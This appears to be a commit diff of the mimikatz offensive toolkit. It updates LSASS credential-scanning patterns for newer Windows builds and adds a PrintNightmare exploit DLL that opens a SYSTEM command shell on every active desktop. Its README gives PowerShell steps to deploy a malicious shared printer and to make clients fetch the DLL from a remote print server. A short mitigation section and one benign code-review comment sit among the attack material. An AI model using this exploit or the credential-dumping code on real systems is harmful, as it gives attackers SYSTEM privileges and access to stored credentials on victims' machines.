#include "../kuhl_m_lsadump.h" // to move
|
||||
#include "../modules/kull_m_string.h"
|
||||
#include "../modules/kull_m_ldap.h"
|
||||
|
||||
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
|
||||
@ -39,13 +41,15 @@ typedef struct _USER_PROPERTIES {
|
||||
|
||||
const wchar_t * KUHL_M_LSADUMP_UF_FLAG[32];
|
||||
|
||||
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId);
|
||||
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport);
|
||||
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
|
||||
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
|
||||
void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
|
||||
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
|
||||
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
|
||||
void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL someExport);
|
||||
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport);
|
||||
void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL withDeleted, BOOL decodeUAC);
|
||||
|
||||
typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);
|
||||
|
@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
|
||||
{
|
||||
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
|
||||
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
|
||||
if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
|
||||
{
|
||||
aRemote.address = containerManager.unk7;
|
||||
|
@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential)
|
||||
kprintf(L"[UsernameForPacked] ?");
|
||||
break;
|
||||
default:
|
||||
kprintf(L"[?] ?");
|
||||
kprintf(L"[?] ? %u ?", type);
|
||||
}
|
||||
CredFree(Credential);
|
||||
}
|
||||
|
@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
|
||||
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
||||
BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
|
||||
BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
|
||||
BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
||||
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
|
||||
@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}},
|
||||
{KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
|
||||
{KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
|
||||
{KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
|
||||
};
|
||||
#elif defined(_M_IX86)
|
||||
BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};
|
||||
|
@ -6,7 +6,7 @@
|
||||
#include "kuhl_m_sekurlsa_cloudap.h"
|
||||
|
||||
#if defined(_M_X64)
|
||||
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
|
||||
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42};//, 0x18, 0x75};
|
||||
KULL_M_PATCH_GENERIC CloudApReferences[] = {
|
||||
{KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_WALL_CloudApLocateLogonSession), PTRN_WALL_CloudApLocateLogonSession}, {0, NULL}, {-9}},
|
||||
};
|
||||
@ -35,7 +35,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
|
||||
|
||||
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)/*(CloudApGlobalLogonSessionList = (PKIWI_CLOUDAP_LOGON_LIST_ENTRY) ((PBYTE) kuhl_m_sekurlsa_cloudap_package.Module.Informations.DllBase.address + 0x71100))*/)
|
||||
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
|
||||
{
|
||||
aLsassMemory.address = CloudApGlobalLogonSessionList;
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
|
@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
|
||||
DWORD64 unk3;
|
||||
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
|
||||
// ...
|
||||
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
|
||||
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
|
||||
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
|
||||
DWORD unk0;
|
||||
DWORD unk1;
|
||||
DWORD unk2;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
DWORD unk3;
|
||||
DWORD unk4;
|
||||
DWORD unk5;
|
||||
DWORD unk6;
|
||||
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
|
||||
// ...
|
||||
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
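Review bot: `Flink` and `Blink` in the new `_KIWI_CLOUDAP_LOGON_LIST_ENTRY_11` are typed as `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *`, which is the older struct and, judging by the fields visible above it, has a different layout. Code that follows these links without a cast would read the next node with the wrong field offsets; `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 *Flink;` and the same for `Blink` keep the type self-consistent. No hunk visible on this page uses the new struct, so a short comment saying which builds it describes would also help.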
|
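--- a/mimispool/README.md
+++ b/mimispool/README.md
@@ -0,0 +1,166 @@
+## PowerShell commands
+
+### Server
+
+#### install
+```
+$printerName = 'Kiwi Legit Printer'
+$system32 = $env:systemroot + '\system32'
+$drivers = $system32 + '\spool\drivers'
+$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
+
+Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip'
+Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk'
+
+Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
+Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
+Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
+
+Add-PrinterDriver -Name 'Generic / Text Only'
+Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
+
+New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
+
+New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
+
+New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
+
+New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
+New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
+
+```
+
+#### uninstall
+```
+$printerName = 'Kiwi Legit Printer'
+$system32 = $env:systemroot + '\system32'
+$drivers = $system32 + '\spool\drivers'
+
+Remove-Printer -Name $printerName
+Start-Sleep -Seconds 2
+Remove-PrinterDriver -Name 'Generic / Text Only'
+
+Remove-Item -Force -Path ($drivers + '\x64\3\mimispool.dll')
+Remove-Item -Force -Path ($drivers + '\W32X86\3\mimispool.dll')
+Remove-Item -Force -Path ($system32 + '\mimispool.dll')
+
+```
+
+### Client
+
+#### Any computer with explicit credential to `printnightmare.gentilkiwi.com`
+```
+$serverName = 'printnightmare.gentilkiwi.com'
+$username = 'gentilguest'
+$password = 'password'
+$printerName = 'Kiwi Legit Printer'
+
+$fullprinterName = '\\' + $serverName + '\' + $printerName
+$credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force)))
+
+Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue
+Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
+
+New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null
+Add-Printer -ConnectionName $fullprinterName
+
+$driver = (Get-Printer -Name $fullprinterName).DriverName
+Remove-Printer -Name $fullprinterName
+Remove-PrinterDriver -Name $driver
+Remove-PSDrive -Force -Name 'KiwiLegitPrintServer'
+# mimispool still in spool\drivers
+
+```
+
+#### Computer in domain (single sign on with current user to print server)
+```
+$serverName = 'print.lab.local'
+$printerName = 'Kiwi Legit Printer'
+
+$fullprinterName = '\\' + $serverName + '\' + $printerName
+
+Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
+Add-Printer -ConnectionName $fullprinterName
+
+$driver = (Get-Printer -Name $fullprinterName).DriverName
+Remove-Printer -Name $fullprinterName
+Remove-PrinterDriver -Name $driver
+# mimispool still in spool\drivers
+
+```
+
+## Protect
+_to adapt to your environment_
+
+**Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings**
+
+### Registry
+
+#### `.reg` file
+```
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
+"PackagePointAndPrintOnly"=dword:00000001
+"PackagePointAndPrintServerList"=dword:00000001
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
+"1"="/your really legit servers or invalid entry !/"
+```
+
+#### commands
+```
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/"
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
+```
+
+### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers
+
+#### `.reg` file
+```
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
+"PackagePointAndPrintOnly"=dword:00000001
+"PackagePointAndPrintServerList"=dword:00000001
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
+"srv1.fqdn"="srv1.fqdn"
+"srv2.fqdn"="srv2.fqdn"
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
+"RestrictDriverInstallationToAdministrators"=dword:00000000
+```
+
+#### commands
+```
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn"
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn"
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
+
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0
+```
+
+### GPO / Local
+
+In `Computer Configuration`, `Administrative Templates`, `Printers`, enable:
+- `Only use Package Point and Print`
+- `Package Point and Print - Approved servers`
+
+
+
+### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers
+
+Same configuration as previously - _with real printer server names this time_ - but do not forget to add registry key `RestrictDriverInstallationToAdministrators` to `0`
+
+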
@ -5,48 +5,36 @@
|
||||
*/
|
||||
#include "mimispool.h"
|
||||
|
||||
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
|
||||
{
|
||||
BOOL ret = TRUE;
|
||||
|
||||
switch( ul_reason_for_call )
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_ATTACH");
|
||||
ret = FALSE;
|
||||
// FALSE avoid to keep library in memory (PrintNightmare < 3/4)
|
||||
// TRUE will mimic "real" driver/config -- to use/test with /useown on local (remote is not compatible with GetFileVersionInfo*)
|
||||
break;
|
||||
UNREFERENCED_PARAMETER(hinstDLL);
|
||||
UNREFERENCED_PARAMETER(lpReserved);
|
||||
|
||||
case DLL_THREAD_ATTACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_ATTACH");
|
||||
break;
|
||||
if (fdwReason == DLL_PROCESS_ATTACH)
|
||||
{
|
||||
RunProcessForAll(L"cmd.exe");
|
||||
}
|
||||
|
||||
case DLL_THREAD_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-THREAD_DETACH");
|
||||
break;
|
||||
|
||||
case DLL_PROCESS_DETACH:
|
||||
kspool(TEXT(__FUNCTION__) L"-PROCESS_DETACH");
|
||||
break;
|
||||
}
|
||||
|
||||
return ret;
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
// PrintNightMare 2.x - via config file and/or "real driver"
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if ( dwMode == DRVQUERY_USERMODE)
|
||||
if (dwMode == DRVQUERY_USERMODE)
|
||||
{
|
||||
*pcbNeeded = sizeof(DWORD);
|
||||
if (pBuffer && (cbBuf >= sizeof(DWORD)))
|
||||
{
|
||||
status = TRUE;
|
||||
*(DWORD *)pBuffer = TRUE;
|
||||
*(DWORD*)pBuffer = TRUE;
|
||||
}
|
||||
SetLastError(ERROR_INSUFFICIENT_BUFFER);
|
||||
}
|
||||
@ -58,13 +46,11 @@ BOOL APIENTRY APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbB
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pded)
|
||||
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
|
||||
if((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
if ((iEngineVersion < 0x20000) || (cj < 0x10))
|
||||
{
|
||||
SetLastError(ERROR_BAD_DRIVER_LEVEL);
|
||||
}
|
||||
@ -81,50 +67,83 @@ BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA *pde
|
||||
|
||||
VOID APIENTRY DrvDisableDriver()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
;
|
||||
}
|
||||
|
||||
VOID APIENTRY DrvResetConfigCache()
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
}
|
||||
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
||||
|
||||
void kspool(LPCWSTR szFrom)
|
||||
// PrintNightMare 4.x - via CopyFiles
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
FILE * kspool_logfile;
|
||||
WCHAR Buffer[256 + 1];
|
||||
DWORD cbBuffer = ARRAYSIZE(Buffer);
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4996)
|
||||
if(kspool_logfile = _wfopen(L"mimispool.log", L"a"))
|
||||
#pragma warning(pop)
|
||||
{
|
||||
klog(kspool_logfile, L"[" PLATFORM L"] [%s] as \'%s\'\n", szFrom, GetUserName(Buffer, &cbBuffer) ? Buffer : L"-");
|
||||
fclose(kspool_logfile);
|
||||
}
|
||||
}
|
||||
|
||||
void klog(FILE * logfile, PCWCHAR format, ...)
|
||||
{
|
||||
if(logfile)
|
||||
{
|
||||
va_list args;
|
||||
va_start(args, format);
|
||||
vfwprintf(logfile, format, args);
|
||||
va_end(args);
|
||||
fflush(logfile);
|
||||
}
|
||||
}
|
||||
|
||||
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszDirectory);
|
||||
UNREFERENCED_PARAMETER(pSplClientInfo);
|
||||
UNREFERENCED_PARAMETER(dwLevel);
|
||||
UNREFERENCED_PARAMETER(pszSourceDir);
|
||||
UNREFERENCED_PARAMETER(pcchSourceDirSize);
|
||||
UNREFERENCED_PARAMETER(pszTargetDir);
|
||||
UNREFERENCED_PARAMETER(pcchTargetDirSize);
|
||||
UNREFERENCED_PARAMETER(dwFlags);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
||||
{
|
||||
kspool(TEXT(__FUNCTION__));
|
||||
UNREFERENCED_PARAMETER(pszPrinterName);
|
||||
UNREFERENCED_PARAMETER(pszKey);
|
||||
UNREFERENCED_PARAMETER(dwCopyFileEvent);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
// Kiwi payload - SYSTEM on all active desktop(s)
|
||||
BOOL RunProcessForAll(LPWSTR szProcess)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
STARTUPINFO si = { 0 };
|
||||
PROCESS_INFORMATION pi = { 0 };
|
||||
HANDLE hToken, hNewToken;
|
||||
DWORD i, count;
|
||||
LPVOID Environment;
|
||||
PSESSIONIDW sessions;
|
||||
|
||||
si.cb = sizeof(si);
|
||||
si.lpDesktop = L"winsta0\\default";
|
||||
|
||||
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
{
|
||||
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
|
||||
{
|
||||
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
|
||||
{
|
||||
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
|
||||
{
|
||||
for (i = 0; i < count; i++)
|
||||
{
|
||||
if (sessions[i].State == State_Active)
|
||||
{
|
||||
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
|
||||
{
|
||||
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
|
||||
{
|
||||
CloseHandle(pi.hThread);
|
||||
CloseHandle(pi.hProcess);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if (sessions)
|
||||
{
|
||||
WinStationFreeMemory(sessions);
|
||||
}
|
||||
}
|
||||
DestroyEnvironmentBlock(Environment);
|
||||
}
|
||||
CloseHandle(hNewToken);
|
||||
}
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
@ -1,10 +1,11 @@
|
||||
LIBRARY
|
||||
EXPORTS
|
||||
; PrintNightMare 2.x - via config file and/or "real driver"
|
||||
DrvResetConfigCache
|
||||
DrvQueryDriverInfo
|
||||
DrvEnableDriver
|
||||
DrvDisableDriver
|
||||
|
||||
DrvResetConfigCache
|
||||
|
||||
; PrintNightMare 4.x - via CopyFiles
|
||||
GenerateCopyFilePaths
|
||||
SpoolerCopyFileEvent
|
@ -5,35 +5,75 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <userenv.h>
|
||||
|
||||
#if defined(_M_X64) || defined(_M_ARM64) // to do, for real one day
|
||||
#define PLATFORM L"x64"
|
||||
#elif defined(_M_IX86)
|
||||
#define PLATFORM L"x86"
|
||||
#endif
|
||||
//__pragma(comment(linker, "/export:DllCanUnloadNow=KyXPUI_orig.DllCanUnloadNow,PRIVATE"))
|
||||
//__pragma(comment(linker, "/export:DllGetClassObject=KyXPUI_orig.DllGetClassObject,PRIVATE"))
|
||||
|
||||
typedef LONG_PTR (APIENTRY *PFN)();
|
||||
#define LOGONID_CURRENT ((ULONG) -1)
|
||||
#define SERVERHANDLE_CURRENT ((HANDLE) NULL)
|
||||
#define MAX_THINWIRECACHE 4
|
||||
#define WINSTATIONNAME_LENGTH 32
|
||||
#define DOMAIN_LENGTH 17
|
||||
#define USERNAME_LENGTH 20
|
||||
typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
|
||||
|
||||
typedef enum _WINSTATIONSTATECLASS {
|
||||
State_Active = 0,
|
||||
State_Connected = 1,
|
||||
State_ConnectQuery = 2,
|
||||
State_Shadow = 3,
|
||||
State_Disconnected = 4,
|
||||
State_Idle = 5,
|
||||
State_Listen = 6,
|
||||
State_Reset = 7,
|
||||
State_Down = 8,
|
||||
State_Init = 9
|
||||
} WINSTATIONSTATECLASS;
|
||||
|
||||
#pragma warning(push)
|
||||
#pragma warning(disable:4201)
|
||||
typedef struct _SESSIONIDW {
|
||||
union {
|
||||
ULONG SessionId;
|
||||
ULONG LogonId;
|
||||
} DUMMYUNIONNAME;
|
||||
WINSTATIONNAME WinStationName;
|
||||
WINSTATIONSTATECLASS State;
|
||||
} SESSIONIDW, * PSESSIONIDW;
|
||||
#pragma warning(pop)
|
||||
|
||||
BOOLEAN WINAPI WinStationEnumerateW(IN HANDLE hServer, OUT PSESSIONIDW* SessionIds, OUT PULONG Count);
|
||||
BOOLEAN WINAPI WinStationFreeMemory(IN PVOID Buffer);
|
||||
|
||||
typedef LONG_PTR(APIENTRY* PFN)();
|
||||
|
||||
typedef struct _DRVFN {
|
||||
ULONG iFunc;
|
||||
PFN pfn;
|
||||
} DRVFN, *PDRVFN;
|
||||
} DRVFN, * PDRVFN;
|
||||
|
||||
typedef struct tagDRVENABLEDATA {
|
||||
ULONG iDriverVersion;
|
||||
ULONG c;
|
||||
DRVFN *pdrvfn;
|
||||
} DRVENABLEDATA, *PDRVENABLEDATA;
|
||||
DRVFN* pdrvfn;
|
||||
} DRVENABLEDATA, * PDRVENABLEDATA;
|
||||
|
||||
#define DRVQUERY_USERMODE 1
|
||||
|
||||
